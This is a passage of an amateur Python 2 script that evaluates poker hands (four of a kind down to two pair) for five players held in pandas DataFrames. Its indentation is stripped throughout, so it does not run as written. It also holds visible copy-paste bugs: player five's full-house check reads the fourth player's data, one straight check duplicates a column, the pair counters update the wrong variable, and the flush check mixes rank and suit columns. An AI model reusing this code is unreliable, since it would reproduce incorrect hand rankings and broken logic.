list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a4 = m
break
if count == 4:
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a5 = m
break
if count == 4:
break
# Checking for Four of a kind
if (FK > 0):
print "Four of a kind"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for full house
FH = 0
a1i = 0
a1ii = 0
a2i = 0
a2ii = 0
a3i = 0
a3ii = 0
a4i = 0
a4ii = 0
a5i = 0
a5ii = 0
next = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a1i = m
a1ii = n
break
if count == 2:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a2i = m
a2ii = n
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a3i = m
a3ii = n
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a4i = m
a4ii = n
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a5i = m
a5ii = n
break
# Evaluating for Full House
if (FH > 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
c = 0
if a1i == b:
c = c + 1
elif a2i == b:
c = c + 1
elif a3i == b:
c = c + 1
elif a4i == b:
c = c + 1
elif a5i == b:
c = c + 1
if c > 1:
b = max(a1ii, a2ii, a3ii, a4ii, a5ii)
if a1ii == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2ii == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3ii == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4ii == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5ii == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
elif (FH == 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for Flush
F = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate P1
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
list[5] = df1.iloc[i * 4 + k - 1, 10]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a1 = m
break
# Evaluate P2
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
list[5] = df2.iloc[i * 4 + k - 1, 10]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a2 = m
break
# Evaluate P3
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
list[5] = df3.iloc[i * 4 + k - 1, 10]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a3 = m
break
# Evaluate P4
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
list[5] = df4.iloc[i * 4 + k - 1, 10]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a4 = m
break
# Evaluate P5
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
list[5] = df5.iloc[i * 4 + k - 1, 10]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 5:
F = F + 1
a5 = m
break
if F > 0:
print "Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for Straight
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
# With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in range(0, 7):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == list[6]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[
5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# Check for Straight
if (SF > 0):
print "Straight"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for 3 of a kind
FH = 0
a1i = 0
a2i = 0
a3i = 0
a4i = 0
a5i = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a1i = m
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a2i = m
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a3i = m
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a4i = m
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a5i = m
break
# Evaluating for 3 of a kind
if (FH > 0):
print "3 of a kind"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for two pair and one pair
f1 = [0]
f2 = [0]
f3 = [0]
f4 = [0]
f5 = [0]
a1 = [0]
a2 = [0]
a3 = [0]
a4 = [0]
a5 = [0]
Fin = 0
# Evaluate P1
TP1 = 0
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[3] or list[
0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP1 = TP1 + 1
f1.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5] or list[1] == list[6]):
TP1 = TP1 + 1
f1.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f1.append(list[1])
if TP1 > 1:
f1 = np.sort(f1[::-1]).tolist()
a1.append(f1[0])
a1.append(f1[1])
Fin = Fin + 1
# Evaluate P2
TP2 = 0
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[3] or
list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP2 = TP2 + 1
f2.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5] or list[1] == list[6]):
TP2 = TP2 + 1
f2.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f2.append(list[1])
if TP2 > 1:
f2 = np.sort(f2[::-1]).tolist()
a2.append(f2[0])
a2.append(f2[1])
Fin = Fin + 1
# Evaluate P3
TP3 = 0
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP3 = TP3 + 1
f3.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5] or list[1] == list[6]):
TP3 = TP3 + 1
f3.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f3.append(list[1])
if TP3 > 1:
f3 = np.sort(f3[::-1]).tolist()
a3.append(f3[0])
a3.append(f3[1])
Fin = Fin + 1
# Evaluate P4
TP4 = 0
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[3] or list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP4 = TP4 + 1
f4.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[
4] or list[1] == list[5] or list[1] == list[6]):
TP4 = TP4 + 1
f4.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f4.append(list[1])
if TP4 > 1:
f4 = np.sort(f4[::-1]).tolist()
a4.append(f4[0])
a4.append(f4[1])
Fin = Fin + 1
# Evaluate P5
TP5 = 0
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] ==
list[3] or list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP5 = TP5 + 1
f5.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] ==
list[4] or list[1] == list[5] or list[1] == list[6]):
TP5 = TP5 + 1
f5.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f5.append(list[1])
if TP5 > 1:
f5 = np.sort(f5[::-1]).tolist()
a5.append(f5[0])
a5.append(f5[1])
Fin = Fin + 1
#Check for two pair
if Fin > 0:
print "Two pair"
b = max(max(a1),max(a2),max(a3),max(a4),max(a5))
if max(a1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif max(a2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif max(a3) == b:
